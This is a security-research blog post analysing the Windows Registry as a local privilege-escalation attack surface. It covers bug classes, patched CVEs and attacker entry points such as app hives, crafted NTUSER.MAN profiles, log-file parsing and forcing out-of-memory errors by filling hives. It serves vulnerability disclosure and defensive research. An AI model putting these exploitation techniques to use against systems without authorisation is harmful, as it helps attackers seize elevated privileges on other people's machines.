In this blog post, we get to the heart of the matter, the actual security of the Windows Registry.I'd like to talk about what made a feature that was initially meant to be just a quick test of my fuzzing infrastructure draw me into manual research for the next 1.5 ~ 2 years, and result in Microsoft fixing (so far) 53 CVEs. I will describe the various areas that are important in the context of low-level security research, from very general ones, such as the characteristics of the codebase that allow security bugs to exist in the first place, to more specific ones, like all possible entry points to attack the registry, the impact of vulnerabilities and the primitives they generate, and some considerations on effective fuzzing and where more bugs might still be lurking.
Let's start with a quick recap of the registry's most fundamental properties as an attack surface:
Local attack surface for privilege escalation:As we already know, the Windows Registry is a strictly local attack surface that can potentially be leveraged by a less privileged process to gain the privileges of a higher privileged process or the kernel.It doesn't have any remote components except for the Remote Registry service, which is relatively small and not accessible from the Internet on most Windows installations.
Complex, old codebase in a memory-unsafe language:The Windows Registry is a vast and complexmechanism, entirely written in C, most of it many years ago.This means that both logic and memory safety bugs are likely to occur, and many such issues, once found, would likely remain unfixed for years or even decades.
Present in the core NT kernel:The registry implementation resides in the core Windows kernel executable (ntoskrnl.exe), which means it is not subject to mitigations like the win32k lockdown.Of course, the reachability of each registry bug needs to be considered separately in the context of specific restrictions (e.g., sandbox), as some of them require file system access or the ability to open a handle to a specific key.Nevertheless, being an integral part of the kernel significantly increases the chances that a given bug can be exploited.
Most code reachable by unprivileged users: The registry is a feature that was created for use by ordinary user-mode applications.It is therefore not surprising that the vast majority of registry-related code is reachable without any special privileges, and only a small part of the interface requires administrator rights.Privilege escalation from medium IL (Integrity Level) to the kernel is probably the most likely scenario of how a registry vulnerability could be exploited.
Manages sensitive information:In addition to the registry implementation itself being complex and potentially prone to bugs, it's important to remember that the registry inherently stores security-critical system information, including various global configurations, passwords, user permissions, and other sensitive data.This means that not only low-level bugs that directly allow code execution are a concern, but also data-only attacks and logic bugs that permit unauthorized modification or even disclosure of registry keys without proper permissions.
Not trivial to fuzz, and not very well documented:Overall, it seems that the registry is not a very friendly target for bug hunting without any knowledge of its internals.At the same time, obtaining the information is not easy either, especially for the latest registry mechanisms, which arenot publicly documented and learning about them basically boils down to reverse engineering.In other words, the entry bar into this area is quite high, which can be an advantage or a disadvantage depending on the time and commitment of a potential researcher.
Security properties
The above cursory analysis seems to indicate that the registry may be a good audit target for someone interested in EoP bugs on Windows.Let's now take a closer look at some of the specific low-level reasons why the registry has proven to be a fruitful research objective.
Broad range of bug classes
Due to the registry being both complex and a central mechanism in the system operating with kernel-mode privileges, numerous classes of bugs can occur within it. An example vulnerability classification is presented below:
Hive memory corruption:Every invasive operation performed on the registry (i.e., a "write" operation) is reflected in changes made to the memory-mapped view of the hive's structure.Considering that objects within the hive include variable-length arrays, structures with counted references, and references to other cells via cell indexes (hives' equivalent of memory pointers), it's natural to expect common issues like buffer overflows or use-after-frees.
Pool memory corruption:In addition to hive memory mappings, the Configuration Manager also stores a significant amount of information on kernel pools.Firstly, there are cached copies of certain hive data, as described in my previous blog post.Secondly, there are various auxiliary objects, such as those allocated and subsequently released within a single system call.Many of these objects can fall victim to memory management bugs typical of the C language.
Information disclosure:Because the registry implementation is part of the kernel, and it exchanges large amounts of information with unprivileged user-mode applications, it must be careful not to accidentally disclose uninitialized data from the stack or kernel pools to the caller.This can happen both through output data copied to user-mode memory and through other channels, such as data leakage to a file (hive file or related log file).Therefore, it is worthwhile to keep an eye on whether all arrays and dynamically allocated buffers are fully populated or carefully filled with zeros before passing them to a lower-privileged context.
Race conditions:As a multithreaded environment, Windows allows for concurrent registry access by multiple threads.Consequently, the registry implementation must correctly synchronize access to all shared kernel-side objects and be mindful of "double fetch" bugs, which are characteristic of user-mode client interactions.
Logic bugs:In addition to being memory-safe and free of low-level bugs, a secure registry implementation must also enforce correct high-level security logic.This means preventing unauthorized users from accessing restricted keys and ensuring that the registry operates consistently with its documentation under all circumstances.This requires a deep understanding of both the explicit documentation and the implicit assumptions that underpin the registry's security from the kernel developers.Ultimately, any behavior that deviates from expected logic, whether documented or assumed, could lead to vulnerabilities.
Inter-process attacks: The registry can serve as a security target, but also as a means to exploit flaws in other applications on the system. It is a shared database, and a local attacker has many ways to indirectly interact with more privileged programs and services.A simple example is when privileged code sets overly permissive permissions on its keys, allowing unauthorized reading or modification.More complex cases can occur when there is a race condition between key creation and setting its restricted security descriptor, or when a key modification involving several properties is not performed transactionally, potentially leading to an inconsistent state.The specifics depend on how the privileged process uses the registry interface.
If I were to depict the Windows Registry in a single Venn diagram, highlighting its various possible bug classes, it might look something like this:
Manual reference counting
As I have mentioned multiple times, security descriptors in registry hives are shared by multiple keys, and therefore, must be reference counted.The field responsible for this is a 32-bit unsigned integer, and any situation where it's set to a value lower than the actual number of references can result in the release of that security descriptor while it's still in use, leading to a use-after-free condition and hive-based memory corruption.So, we see that it's absolutely critical that this refcounting is implemented correctly, but unfortunately, there are (or were until recently) many reasons why this mechanism could be prone to bugs:
Usually, a reference count is a construct that exists strictly in memory, where it is initialized with a value of 1, then incremented and decremented some number of times, and finally drops to zero, causing the object to be freed.However, with registry hives, the initial refcount values are loaded from disk, from a file that we assume is controlled by the attacker.Therefore, these values cannot be trusted in any way, and the first necessary step is to actually compare and potentially adjust them according to the true number of references to each descriptor. Even though this is done in theory, bugs can creep into this logic in practice (CVE-2022-34707, CVE-2023-38139).
For a long time, all operations on reference counts were performed by directly referencing the _CM_KEY_SECURITY.ReferenceCount field, instead of using a secure wrapper.As a result, none of these incrementations were protected against integer overflow.This meant that not only a too small, but also a too large refcount value could eventually overflow and lead to a use-after-free situation (CVE-2023-28248, CVE-2024-43641).This weakness was gradually addressed in various places in the registry code between April 2023 and November 2024.Currently, all instances of refcount incrementation appear to be secure and involve calling the special helper function CmpKeySecurityIncrementReferenceCount, which protects against integer overflow.Its counterpart for refcount decrementation is CmpKeySecurityDecrementReferenceCount.
It seems that there is a lack of clarity and understanding of how certain special types of keys, such as predefined keys and tombstone keys, behave in relation to security descriptors.In theory, the only type of key that does not have a security descriptor assigned to it is the exit node (i.e., a key with the KEY_HIVE_EXIT flag set, found solely in the virtual hive rooted at \Registry\), while all other keys do have a security descriptor assigned to them, even if it is not used for anything.In practice, however, there have been several vulnerabilities in Windows that resulted either from incorrect security refresh in KCB for special types of keys (CVE-2023-21774), from releasing the security descriptor of a predefined key without considering its reference count (CVE-2023-35356), or from completely forgetting the need for reference counting the descriptors of tombstone keys in the "rename" operation (CVE-2023-35382).
When the reference count of a security descriptor reaches zero and is released, this operation is irreversible.There is no guarantee that upon reallocation, the descriptor would have the same cell index, or even that it could be reallocated at all.This is crucial for multi-step operations where individual actions could fail, necessitating a full rollback to the original state. Ideally, releasing security descriptors should always be the final step, only when the kernel can be certain that the entire operation will succeed.A vulnerability exemplifying this is CVE-2023-21772, where the registry virtualization code first released the old security descriptor and then attempted to allocate a new one.If the allocation failed, the key was left without any security properties, violating a fundamental assumption of the registry and potentially having severe consequences for system memory safety.
Aggressive self-healing and recovery
As I described in blog post #5, one of the registry's most interesting features, which distinguishes it from many other file format implementations, is that it is self-healing.The entire hive loading process, from the internal CmCheckRegistry function downwards, is focused on loading the database at all costs, even if some corrupted fragments are encountered.Only if the file damage is so extensive that recovering any data is impossible does the entire loading process fail.Of course, given that the registry stores critical system data such as its basic configuration, and the lack of access to this data virtually prevents Windows from booting, this decision made a lot of sense from the system reliability point of view.It's probably safe to assume that it has prevented the need for system reinstallation on numerous computers, simply because it did not reject hives with minor damage that might have appeared due to random hardware failure.
However, from a security perspective, this behavior is not necessarily advantageous.Firstly, it seems obvious that upon encountering an error in the input data, it is simpler to unconditionally halt its processing rather than attempt to repair it.In the latter case, it is possible for the programmer to overlook an edge case – forget to reset some field in some structure, etc. – and thus instead of fixing the file, allow for another unforeseen, inconsistent state to materialize within it.In other words, the repair logic constitutes an additional attack surface, and one that is potentially even more interesting and error-prone than other parts of the implementation.A classic example of a vulnerability associated with this property is CVE-2023-38139.
Secondly, in my view, the existence of this logic may have negatively impacted the secure development of the registry code, perhaps by leading to a discrepancy between what it guaranteed and what other developers thought it had guaranteed.For example, in 1991–1993, when the foundations of the Configuration Manager subsystem were being created in their current form, probably no one considered hive loading a potential attack vector.At that time, the registry was used only to store system configuration, and controlled hive loading was privileged and required admin rights.Therefore, I suspect that the main goal of hive checking at that time was to detect simple data inconsistencies due to hardware problems, such as single bit flips.No one expected a hive to contain a complex, specially crafted multi-kilobyte data structure designed to trigger a security flaw.Perhaps the rest of the registry code was written under the assumption that since data sanitization and self-healing occurred at load time, its state was safe from that point on and no further error handling was needed (except for out-of-memory errors).Then, in Windows Vista, a decision was made to open access to controlled hive loading by unprivileged users through the app hive mechanism, and it suddenly turned out that the existing safeguards were not entirely adequate. Attackers now became able to devise data constructs that were structurally correct at the low level, but completely beyond the scope of what the actual implementation expected and could handle.
Finally, self-healing can adversely affect system security by concealing potential registry bugs that could trigger during normal Windows operation.These problems might only become apparent after a period of time and with a "build-up" of enough issues within the hive.Because hives are mapped into memory, and the kernel operates directly on the data within the file, there exists a category of errors known as "inconsistent hive state". This refers to a data structure within the hive that doesn't fully conform to the file format specification.The occurrence of such an inconsistency is noteworthy in itself and, for someone knowledgeable about the registry, it could be a direct clue for finding vulnerabilities.However, such instances rarely cause an immediate system crash or other visible side effects.Consider security descriptors and their reference counting: as mentioned earlier, any situation where the active number of references exceeds the reference count indicates a serious security flaw.However, even if this were to happen during normal system operation, it would require all other references to that descriptor to be released and then for some other data to overwrite the freed descriptor. Then, a dangling reference would need to be used to access the descriptor.The occurrence of all these factors in sequence is quite unlikely, and the presence of self-healing further decreases these chances, as the reference count would be restored to its correct value at the next hive load.This characteristic can be likened to wrapping the entire registry code in a try/except block that catches all exceptions and masks them from the user. This is certainly helpful in the context of system reliability, but for security, it means that potential bugs are harder to spot during system run time and, for the same reason, quite difficult to fuzz.This does not mean that they don't exist; their detection just becomes more challenging.
Unclear boundaries between hard and conventional format requirements
This point is related to the previous section.In the regf format, there are certain requirements that are fairly obvious and must be always met for a file to be considered valid. Likewise, there are many elements that are permitted to be formatted arbitrarily, at the discretion of the format user.However, there is a third category, a gray area of requirements that seem reasonable and probably would be good if they were met, but it is not entirely clear whether they are formally required.Another way to describe this set of states is one that is not generated by the Windows kernel itself but is still not obviously incorrect. From a researcher's perspective, it would be worthwhile to know which parts of the format are actually required by the specification and which are only a convention adopted by the Windows code.
We might never find out, as Microsoft hasn't published an official format specification and it seems unlikely that they will in the future.The only option left for us is to rely on the implementation of the CmpCheck* functions (CmpCheckKey, CmpCheckValueList, etc.) as a sort of oracle and assume that everything there is enforced as a hard requirement, while all other states are permissible. If we go down this path, we might be in for a big surprise, as it turns out that there are many logical-sounding requirements that are not enforced in practice.This could allow user-controlled hives to contain constructs that are not obviously problematic, but are inconsistent with the spirit of the registry and its rules.In many cases, they allow encoding data in a less-than-optimal way, leading to unexpected redundancy.Some examples of such constructs are presented below:
Values with duplicate names within a single key: Under normal conditions, only one value with a given name can exist in a key, and if there is a subsequent write to the same name, the new data is assigned to the existing value.However, the uniqueness of value names is not required in input hives, and it is possible to load a hive with duplicate values.
Duplicate identical security descriptors within a single hive: Similar to the previous point, it is assumed that security descriptors within a hive are unique, and if an existing descriptor is assigned to another key, its reference count is incremented rather than allocating a new object.However, there is no guarantee that a specially crafted hive will not contain multiple duplicates of the same security descriptor, and this is accepted by the loader.
Uncompressed key names consisting solely of ASCII characters: Under normal circumstances, if a given key has a name comprising only ASCII characters, it will always be stored in a compressed form, i.e., by writing two bytes of the name in each element of the _CM_KEY_NODE.Name array of type uint16, and setting the KEY_COMP_NAME flag (0x20) in _CM_KEY_NODE.Flags.However, once again, optimal representation of names is not required when loading the hive, and this convention can be ignored without issue.
Allocated but unused cells:The Windows registry implementation deallocates objects within a hive when they are no longer needed, making space for new data.However, the loader does not require every cell marked "allocated" to be actively used.Similarly, security descriptors with a reference count of zero are typically deallocated.However, until a November 2024 refactor of the CmpCheckAndFixSecurityCellsRefcount function, it was possible to load a hive with unused security descriptors still present in the linked list.This behavior has since been changed, and unused security descriptors encountered during loading are now automatically freed and removed from the list.
These examples illustrate the issue well, but none of them (as far as I know) have particularly significant security implications.However, there were also a few specific memory corruption vulnerabilities that stemmed from the fact that the registry code made theoretically sound assumptions about the hive structure, but they were not unenforced by the loader:
CVE-2022-37988: This bug is closely related to the fact that cells larger than 16 KiB are aligned to the nearest power of two in Windows, but this condition doesn't need to be satisfied during loading.This caused the shrinking of a cell to fail, even though it should always succeed in-place, "surprising" the client of the allocator and resulting in a use-after-free condition.
CVE-2022-37956: As I described in blog post #5, Windows has some logic to ensure that no leaf-type subkey list (li, lf, or lh) exceeds 511 or 1012 elements, depending on its specific type.If a list is expanded beyond this limit, it is automatically split into two lists, each half the original length.Another reasonable assumption is that the root index length would never approach the maximum value of _CM_KEY_INDEX.Count (uint16) under normal circumstances.This would require an unrealistically large number of subkeys or a very specific sequence of millions of key creations and deletions with specific names.However, it was possible to load a hive containing a subkey list of any of the four types with a length equal to 0xFFFF, and trigger a 16-bit integer overflow on the length field, leading to memory corruption.Interestingly, this is one of the few bugs that could be triggered solely with a single .bat file containing a long sequence of the reg.exe command executions.
CVE-2022-38037: In this case, the kernel code assumed that the hive version defined in the header (_HBASE_BLOCK.Minor) always corresponded to the type of subkey lists used in a given hive.For example, if the file version is regf 1.3, it should be impossible for it to contain lists in a format introduced in version 1.5.However, for some reason, the hive loader doesn't enforce the proper relationship between the format version and the structures used in it, which in this case led to a serious hive-based memory corruption vulnerability.
As we can see, it is crucial to differentiate between format elements that are conventions adopted by a specific implementation, and those actually enforced during the processing of the input file.If we encounter some code that makes assumptions from the former group that don't belong to the latter one, this could indicate a serious security issue.
Susceptibility to mishandling OOM conditions
Generally speaking, the implementation of any function in the Windows kernel is built roughly according to the following scheme:
NTSTATUS NtHighLevelOperation(...) {
NTSTATUS Status;
Status = HelperFunction1(...);
if (!NT_SUCCESS(Status)) {
//
// Clean up...
//
return Status;
}
Status = HelperFunction2(...);
if (!NT_SUCCESS(Status)) {
//
// Clean up...
//
return Status;
}
//
// More calls...
//
return STATUS_SUCCESS;
}
Of course, this is a significant simplification, as real-world code contains keywords and constructs such as if statements, switch statements, various loops, and so on.The key point is that a considerable portion of higher-level functions call internal, lower-level functions specialized for specific tasks.Handling potential errors signalled by these functions is an important aspect of kernel code (or any code, for that matter).In low-level Windows code, error propagation occurs using the NTSTATUS type, which is essentially a signed 32-bit integer.A value of 0 signifies success (STATUS_SUCCESS), positive values indicate success but with additional information, and negative values denote errors.The sign of the number is checked by the NT_SUCCESS macro.During my research, I dedicated significant time to analyzing the error handling logic. Let's take a moment to think about the types of errors that could occur during registry operations, and the conditions that might cause them.
A common trait of all actions that modify data in the registry is that they allocate memory.The simplest example is the allocation of auxiliary buffers from kernel pools, requested through functions from the ExAllocatePoolgroup.If there is very little available memory at a given point in time, one of the allocation requests may return the STATUS_INSUFFICIENT_RESOURCES error code, which will be propagated back to the original caller.And since we assume that we take on the role of a local attacker who has the ability to execute code on the machine, artificially occupying all available memory is potentially possible in many ways.So this is one way to trigger errors while performing operations on the registry, but admittedly not an ideal way, as it largely depends on the amount of RAM and the maximum pagefile size.Additionally, in a situation where the kernel has so little memory that single allocations start to fail, there is a high probability of the system crashing elsewhere before the vulnerability is successfully exploited.And finally, if several allocations are requested in nearby code in a short period of time, it seems practically impossible to take precise control over which of them will succeed and which will not.
Nonetheless, the overall concept of out-of-memory conditions is a very promising avenue for attack, especially considering that the registry primarily operates on memory-mapped hives using its own allocator, in addition to objects from kernel pools.The situation is even more favorable for an attacker due to the 2 GiB size limitation of each of the two storage types (stable and volatile) within a hive. While this is a relatively large value, it is achievable to occupy it in under a minute on today's machines.The situation is even easier if the volatile space that needs to be occupied, as it resides solely in memory and is not flushed to disk – so filling two gigabytes of memory is then a matter of seconds. It can be accomplished, for example, by creating many long registry values, which is a straightforward task when dealing with a controlled hive.However, even in system hives, this is often feasible.To perform data spraying on a given hive, we only need a single key granting us write permissions.For instance, both HKLM\Software and HKLM\System contain numerous keys that allow write access to any user in the system, effectively permitting them to fill it to capacity.Additionally, the "global registry quota" mechanism, implemented by the internal CmpClaimGlobalQuota and CmpReleaseGlobalQuota functions, ensures that the total memory occupied by registry data in the system does not exceed 4 GiB. Besides filling the entire space of a specific hive, this is thus another way to trigger out-of-memory conditions in the registry, especially when targeting a hive without write permissions.A concrete example where this mechanism could have been employed to corrupt the HKLM\SAM system hive is the CVE-2024-26181 vulnerability.
Considering all this, it is a fair assumption that a local attacker can cause any call to ExAllocatePool*, HvAllocateCell, and HvReallocateCell (with a length greater than the existing cell) to fail.This opens up a large number of potential error paths to analyze.The HvAllocateCell calls are a particularly interesting starting point for analysis, as there are quite a few of them and almost all of them belong to the attack surface accessible to a regular user:
There are two primary reasons why focusing on the analysis of error paths can be a good way to find security bugs.First, it stands to reason that on regular computers used by users, it is extremely rare for a given hive to grow to 2 GiB and run out of space, or for all registry data to simultaneously occupy 4 GiB of memory.This means that these code paths are practically never executed under normal conditions, and even if there were bugs in them, there is a very small chance that they would ever be noticed by anyone.Such rarely executed code paths are always a real treat for security researchers.
The second reason is that proper error handling in code is inherently difficult.Many operations involve numerous steps that modify the hive's internal state.If an issue arises during these operations, the registry code must revert all changes and restore the registry to its original state (at least from the macro-architectural perspective).This requires the developer to be fully aware of all changes applied so far when implementing each error path.Additionally, proper error handling must be considered during the initial design of the control flow as well, because some registry actions are irreversible (e.g., freeing cells). The code must thus be structured so that all such operations are placed at the very end of the logic, where errors cannot occur anymore and successful execution is guaranteed.
One example of such a vulnerability is CVE-2023-23421, which boiled down to the following code:
NTSTATUSCmpCommitRenameKeyUoW(_CM_KCB_UOW*uow){
// ...
if(!CmpAddSubKeyEx(Hive,ParentKey,NewNameKey)||
!CmpRemoveSubKey(Hive,ParentKey,OldNameKey)){
CmpFreeKeyByCell(Hive,NewNameKey);
returnSTATUS_INSUFFICIENT_RESOURCES;
}
// ...
}
The issue here was that if the CmpRemoveSubKey call failed, the corresponding error path should have reversed the effect of the CmpAddSubKeyEx function in the previous line, but in practice it didn't.As a result, it was possible to end up with a dangling reference to a freed key in the subkey list, which was a typical use-after-free condition.
A second interesting example of this type of bug was CVE-2023-21747, where an out-of-memory error could occur during a highly sensitive operation, hive unloading. As there was no way to revert the state at the time of the OOM, the vulnerability was fixed by Microsoft by refactoring the CmpRemoveSubKeyFromList function and other related functions so that they no longer allocate memory from kernel pools and thus there is no longer a physical possibility of them failing.
Finally, I'll mention CVE-2023-38154, where the problem wasn't incorrect error handling, but a complete lack of it – the return value of the HvpPerformLogFileRecovery function was ignored, even though there was a real possibility it could end with an error.This is a fairly classic type of bug that can occur in any programming language, but it's definitely worth keeping in mind when auditing the Windows kernel.
Susceptibility to mishandling partial successes
The previous section discusses bugs in error handling where each function is responsible for reversing the state it has modified.However, some functions don't adhere to this operational model.Instead of operating on an "all-or-nothing" basis, they work on a best-effort basis, aiming to accomplish as much of a given task as possible.If an error occurs, they leave any changes made in place, e.g., because this result is still preferable to not making any changes.This introduces a third possible output state for such functions: complete success, partial success, and complete failure.
This might be problematic, as the approach is incompatible with the typical usage of the NTSTATUS type, which is best suited for conveying one of two (not three) states. In theory, it is a 32-bit integer type, so it could store the additional information of the status being a partial success, and not being unambiguously positive or negative.In practice, however, the convention is to directly propagate the last error encountered within the inner function, and the outer functions very rarely "dig into" specific error codes, instead assuming that if NT_SUCCESS returns FALSE, the entire operation has failed.Such confusion at the cross-function level may have security implications if the outer function should take some additional steps in the event of a partial success of the inner function, but due to the binary interpretation of the returned error code, it ultimately does not execute them.
A classic example of such a bug is CVE-2024-26182, which occurred at the intersection of the CmpAddSubKeyEx (outer) and CmpAddSubKeyToList (inner) functions.The problem here was that CmpAddSubKeyToList implements complex, potentially multi-step logic for expanding the subkey list, which could perform a cell reallocation and subsequently encounter an OOM error.On the other hand, the CmpAddSubKeyEx function assumed that the cell index in the subkey list should only be updated in the hive structures if CmpAddSubKeyToList fully succeeds. As a result, the partial success of CmpAddSubKeyToList could lead to a classic use-after-free situation.An attentive reader will probably notice that the return value type of the CmpAddSubKeyToList routine was BOOL and not NTSTATUS, but the bug pattern is identical.
Overall complexity introduced over time
One of the biggest problems with the modern implementation of the registry is that over the decades of developing this functionality, many changes and new features have been introduced.This has caused the level of complexity of its internal state to increase so much that it seems difficult to grasp for one person, unless they are a full-time registry expert that has worked on it full-time over a period of months or years.I personally believe that the registry existed in its most elegant form somewhere around Windows NT 3.1 – 3.51 (i.e. in the years 1993–1996). At the time, the mechanism was intuitive and logical for both developers and its users.Each object (key, value) either existed or not, each operation ended in either success or failure, and when it was requested on a particular key, you could be sure that it was actually performed on that key. Everything was simple, and black and white.However, over time, more and more shades of gray were being continuously added, departing from the basic assumptions:
The existence of predefined keys meant that every operation could no longer be performed on every key, as this special type of key was unsafe for many internal registry functions to use due to its altered semantics.
Due to symbolic links, opening a specific key doesn't guarantee that it will be the intended one, as it might be a different key that the original one points to.
Registry virtualization has introduced further uncertainty into key operations.When an operation is performed on a key, it is unclear whether the operation is actually executed on that specific key or redirected to a different one.Similarly, with read operations, a client cannot be entirely certain that it is reading from the intended key, as the data may be sourced from a different, virtualized location.
Transactions in the registry mean that a given state is no longer considered solely within the global view of the registry.At any given moment, there may also be changes that are visible only within a certain transaction (when they are initiated but not yet committed), and this complex scenario must be correctly handled by the kernel.
Layered keys have transformed the nature of hives, making them interdependent rather than self-contained database units.This is due to the introduction of differencing hives, which function solely as "patch diffs" and cannot exist independently without a base hive.Additionally, the semantics of certain objects and their fields have been altered.Previously, a key's existence was directly tied to the presence of a corresponding key node within the hive.Layered keys have disrupted this dependency.Now, a key with a key node can be non-existent if marked as a Tombstone, and a key without a corresponding key node can logically exist if its semantics are Merge-Unbacked, referencing a lower-level key with the same name.
Of course, all of these mechanisms were designed and implemented for a specific purpose: either to make life easier for developers/applications using the Registry API, or to introduce some new functionality that is needed today.The problem is not that they were added, but that it seems that the initial design of the registry was simply not compatible with them, so they were sort of forced into the registry, and where they didn't fit, an extra layer of tape was added to hold it all together.This ultimately led to a massive expansion of the internal state that needs to be maintained within the registry.This is evident both in the significant increase in the size of old structures (like KCB) and in the number of new objects that have been added over the years. But the most unfortunate aspect is that each of these more advanced mechanisms seems to have been designed to solve one specific problem, assuming that they would operate in isolation. And indeed, they probably do under typical conditions, but a particularly malicious user could start combining these different mechanisms and making them interact.Given the difficulty in logically determining the expected behavior of some of these combinations, it is doubtful that every such case was considered, documented, implemented, and tested by Microsoft.
The relationships between the various advanced mechanisms in the registry are humorously depicted in the image below:
This section describes the entry points that a local attacker can use to interact with the registry and exploit any potential vulnerabilities.
Hive loading
Let's start with the operation of loading user-controlled hives.Since hive loading is only possible from disk (and not, for example, from a memory buffer), this means that to actually trigger this attack surface, the process must be able to create a file with controlled content, or at least a controlled prefix of several kilobytes in length.Regular programs operating at Medium IL generally have this capability, but write access to disk may be restricted for heavily sandboxed processes (e.g. renderer processes in browsers).
When it comes to the typical type of bugs that can be triggered in this way, what primarily comes to mind are issues related to binary data parsing, and memory safety violations such as out-of-bounds buffer accesses.It is possible to encounter more logical-type issues, but they usually rely on certain assumptions about the format not being sufficiently verified, causing subsequent operations on such a hive to run into problems.It is very rare to find a vulnerability that can be both triggered and exploited by just loading the hive, without performing any follow-up actions on it. But as CVE-2024-43452 demonstrates, it can still happen sometimes.
App hives
The introduction of Application Hives in Windows Vista caused a significant shift in the registry attack surface.It allowed unprivileged processes to directly interact with kernel code that was previously only accessible to system services and administrators.Attackers gained access to much of the NtLoadKey syscall logic, including hive file operations, hive parsing at the binary level, hive validation logic in the CmpCheckRegistry function and its subfunctions, and so on.In fact, of the 53 serious vulnerabilities I discovered during my research, 16 (around 30%) either required loading a controlled hive as an app hive, or were significantly easier to trigger using this mechanism.
It's important to remember that while app hives do open up a broad range of new possibilities for attackers, they don't offer exactly the same capabilities as loading normal (non-app) hives due to several limitations and specific behaviors:
They must be loaded under the special path \Registry\A, which means an app hive cannot be loaded just anywhere in the registry hierarchy.This special path is further protected from references by a fully qualified path, which also reduces their usefulness in some offensive applications.
The logic for unloading app hives differs from unloading standard hives because the process occurs automatically when all handles to the hive are closed, rather than manually unloading the hive through the RegUnLoadKeyWAPI or its corresponding syscall from the NtUnloadKey family.
Operations on app hive security descriptors are very limited: any calls to the RegSetKeySecurityfunction or RegCreateKeyExWwith a non-default security descriptor will fail, which means that new descriptors cannot be added to such hives.
KTM transactions are unconditionally blocked for app hives.
Despite these minor restrictions, the ability to load arbitrary hives remains one of the most useful tools when exploiting registry bugs.Even if binary control of the hive is not strictly required, it can still be valuable.This is because it allows the attacker to clearly define the initial state of the hive where the attack takes place.By taking advantage of the cell allocator's determinism, it is often possible to achieve 100% exploitation success.
User hives and Mandatory User Profiles
Sometimes, triggering a specific bug requires both binary control over the hive and certain features that app hives lack, such as the ability to open a key via its full path. In such cases, an alternative to app hives exists, which might be slightly less practical but still allows for exploiting these more demanding bugs. It involves directly modifying one of the two hives assigned to every user in the system: the user hive (C:\Users\NTUSER.DAT mounted under \Registry\User\<SID>, or in other words, HKCU) or the user classes hive (C:\Users\AppData\Local\Microsoft\Windows\UsrClass.dat mounted under \Registry\User\<SID>_Classes). Naturally, when these hives are actively used by the system, access to their backing files is blocked, preventing simultaneous modification, which complicates things considerably. However, there are two ways to circumvent this problem.
The first scenario involves a hypothetical attacker who has two local accounts on the targeted system, or similarly, two different users collaborating to take control of the computer (let's call them users A and B). User A can grant user B full rights to modify their hive(s), and then log out.User B then makes all the required binary changes to the hive and finally notifies user A that they can log back in. At this point, the Profile Service loads the modified hive on behalf of that user, and the initial goal is achieved.
The second option is more practical as it doesn't require two different users. It abuses Mandatory User Profiles, a system functionality that prioritizes the NTUSER.MAN file in the user's directory over the NTUSER.DAT file as the user hive, if it exists (it doesn't exist in the default system installation).This means that a single user can place a specially prepared hive under the NTUSER.MAN name in their home directory, then log out and log back in. Afterwards, NTUSER.MAN will be the user's active HKCU key, achieving the goal.However, the technique also has some drawbacks – it only applies to the user hive (not UsrClass.dat), and it is somewhat noisy.Once the NTUSER.MAN file has been created and loaded, there is no way to delete it by the same user, as it will always be loaded by the system upon login, effectively blocking access to it.
A few examples of bugs involving one of the two above techniques are CVE-2023-21675, CVE-2023-35356, and CVE-2023-35633.They all required the existence of a special type of key called a predefined key within a publicly accessible hive, such as HKCU.Even when predefined keys were still supported, they could not be created using the system API, and the only way to craft them was by directly setting a specific flag within the internal key node structure in the hive file.
Log file parsing: .LOG/.LOG1/.LOG2
One of the fundamental features of the registry is that it guarantees consistency at the level of interdependent cells that together form the structure of keys within a given hive.This refers to a situation where a single operation on the registry involves the simultaneous modification of multiple cells. Even if there is a power outage and the system restarts in the middle of performing this operation, the registry guarantees that all intermediate changes will either be applied or discarded.Such "atomicity" of operations is necessary in order to guarantee the internal consistency of the hive structure, which, as we know, is important to security. The mechanism is implemented by using additional files associated with the hive, where the intermediate state of registry modifications is saved with the granularity of a memory page (4 KiB), and which can be safely rolled forward or rolled back at the next hive load.Usually these are two files with the .LOG1 and .LOG2 extensions, but it is also possible to force the use of a single log file with the .LOG extension by passing the REG_HIVE_SINGLE_LOG flag to syscalls from the NtLoadKey family.
Internally, each LOG file can be encoded in one of two formats. One is the "legacy log file", a relatively simple format that has existed since the first implementation of the registry in Windows NT 3.1. Another one is the "incremental log file", a slightly more modern and complex format introduced in Windows 8.1 to address performance issues that plagued the previous version.Both formats use the same header as the normal regf format (the first 512 bytes of the _HBASE_BLOCK structure, up to the CheckSum field), with the Type field set to 0x1 (legacy log file on Windows XP and newer), 0x2 (legacy log file on Windows 2000 and older), or 0x6 (incremental log file). Further at offset 0x200, legacy log files contain the signature 0x54524944 ("DIRT") followed by the "dirty vector", while incremental log files contain successive records represented by the magic value 0x454C7648 ("HvLE").
From a security perspective, it's important to note that LOG files are processed for app hives, so their handling is part of the local attack surface.On the other hand, this attack surface isn't particularly large, as it boils down to just a few functions that are called by the two highest-level routines: HvAnalyzeLogFiles and HvpPerformLogFileRecovery.The potential types of bugs are also fairly limited, mainly consisting of shallow memory safety violations. Two specific examples of vulnerabilities related to this functionality are CVE-2023-35386 and CVE-2023-38154.
Log file parsing: KTM logs
Besides ensuring atomicity at the level of individual operations, the Windows Registry also provides two ways to achieve atomicity for entire groups of operations, such as creating a key and setting several of its values as part of a single logical unit.These mechanisms are based on two different types of transactions: KTM transactions (managed by the Kernel Transaction Manager, implemented by the tm.sys driver) and lightweight transactions, which were designed specifically for the registry. Notably, lightweight transactions exist in memory only and are never written to disk, so they do not represent an attack vector during hive loading, because there is no file recovery logic.
KTM transactions are available for use in any loaded hive that doesn't have the REG_APP_HIVE and REG_HIVE_NO_RM flags.To utilize them, a transaction object must first be created using the CreateTransactionAPI. The resulting handle is then passed to the RegOpenKeyTransacted, RegCreateKeyTransacted, or RegDeleteKeyTransactedregistry functions.Finally, the entire transaction is committed via CommitTransaction.Windows attempts to guarantee that active transactions that are caught mid-commit during a sudden system shutdown will be rolled forward when the hive is loaded again.To achieve this, the Windows kernel employs the Common Log File System interface to save serialized records detailing individual operations to the .blf files that accompany the main hive file.When a hive is loaded, the system checks for unapplied changes in these .blf files.If any are found, it deserializes the individual records and attempts to redo all the actions described within them.This logic is primarily handled by the internal functions CmpRmAnalysisPhase, CmpRmReDoPhase, and CmpRmUnDoPhase, as well as the functions surrounding them in the control flow graph.
